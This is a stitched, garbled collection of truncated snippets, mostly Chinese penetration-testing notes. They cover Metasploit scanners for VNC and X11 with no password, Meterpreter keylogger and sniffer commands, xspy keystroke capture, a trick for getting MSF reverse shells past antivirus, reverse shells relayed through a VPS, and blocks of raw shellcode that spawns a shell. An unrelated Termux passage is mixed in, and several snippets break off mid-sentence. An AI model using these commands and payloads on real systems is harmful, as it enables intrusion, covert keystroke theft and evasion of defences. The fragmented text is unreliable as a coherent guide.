auxiliary/scanner/vnc/vnc_none_auth #探测内网中开放的VNC空口令 auxiliary/scanner/x11/open_x11 #探测内网中开放的x11服务器 auxiliary/scanner/http/webdav_scanner #探测内网中开放的webDev服务器 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. MSF主机反弹shell...
对于需要图形化界面的应用,可以考虑使用X11 Forwarding,通过Termux连接到远程X服务器。这需要在Termux中安装x11vnc等工具,并配置相应的环境变量。虽然操作过程相对复杂,但通过这种方式,你可以在Termux中运行一些需要图形界面的应用。总之,Termux是一个功能强大的终端模拟器,可以帮助用户在移动设备上运行Linu...
keyscan_stop #结束键盘记录 12|00x11 sniffer抓包 use sniffer sniffer_interfaces #查看网卡 sniffer_start 2 #选择网卡 开始抓包 sniffer_stats 2 #查看状态 sniffer_dump 2 /tmp/lltest.pcap #导出pcap数据包 sniffer_stop 2 #停止抓包 13|00x12 注册表操作...
192.168.235.129 6000 tcp x11 open access denied 192.168.235.129 6667 tcp irc open Unreal ircd 192.168.235.129 8009 tcp ajp13 open Apache Jserv Protocol v1.3 192.168.235.129 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1 Let’s search for a Samba exploit and try it against the system:...
Open X11 空口令: msf> use auxiliary/scanner/x11/open_x11 set RHOST 192.168.1.0/24 set THREADS 50 run 当扫描到此漏洞的主机后可以使用xspy 工具来监视对方的键盘输入: cd /pentest/sniffers/xspy/ ./xspy –display 192.168.1.125:0 –delay 100 ...
msf是一个很强大的工具,我经常会在渗透用它来反弹shell,不过它生成的反弹后门会被不少杀软kill,这篇文章只是讲讲我在msf中一个简单的免杀小技巧。 No.3 思路 我以前接触过一款python的远控,其实说是远控,基本也就是nc的功能加了一个服务端的web页面控制并加了一些其他的功能可以用来管理诸多客户机 ...
"\x11\x44\xd7\x62\xd4\xf9\xcb\xb0\x89\x09\xb6\x8b\xbc\x4a\x66" "\x85\xcb\xd0\x78\xff\xbd\x16\xf2\xf3\x67\x75\x2d\x99\x3c\x1c" "\x7d\x8a\xda\x54\x8a\x07\xf3\x93\x42\x48\x4b\xc2\x18\x1d\x08" "\xe6\xc8\x41\x41\x0e\xb5\x61\xf6\x4f\xe1\x9e\x4...
将本地监听的端口映射到vsp指定端口,反弹shell连接vps的端口,即可连接本地msf。 CS的使用 关于CS的使用,参考CobaltStrike 官网:https://www.cobaltstrike.com/ CobaltStrike基础学习:https://www.bilibili.com/video/BV1754y1Q7im?p=3&spm_id_from=333.1007.top_right_bar_window_history.content.click ...
x11" "\x53\x98\xcf\x26\x7d\x8b\x98\xe4\x99\x07\x95\xa3\xa7\x34\x50" "\x18\x17\x6d\x4a\x51\x14\x36\x43\x30\xa2\xa7\x06\x2e\xa7\x51" "\x8e\xc0\x08\xef\xeb\xf0\xd1\x3f\x2f\x27\xf9\xf6\x7e\x53\x38" "\xe8\xd4\xec\x9e\x30\xb9\x59\x66\x34\xc0\...
"\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89" + "\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd" + "\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49" + "\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"...